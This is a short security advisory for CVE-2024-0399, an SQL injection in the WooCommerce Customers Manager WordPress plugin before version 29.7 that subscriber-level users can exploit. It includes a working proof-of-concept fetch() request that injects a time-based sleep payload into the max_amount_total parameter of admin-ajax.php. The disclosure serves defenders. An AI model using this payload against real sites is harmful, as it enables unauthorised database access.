WooCommerce Customers Manager < 29.7 – Subscriber+ SQL Injection | CVE 2024-0399

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.

Note: v29.5 added authorisation, however the injection was not fixed and still exploitable by users with the manage_woocommerce capability, such as Shop Manager and above

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user and note the 20s delayed response

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wccm_get_orders_tot_num&start_date=2024-01-09&end_date=2024-01-11&min_amount=0&max_amount=0&min_amount_total=0&product_relationship=or&product_category_relationship=or&product_category_filters_relationship=and&statuses=wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft&max_amount_total=(select*from(select(sleep(20)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));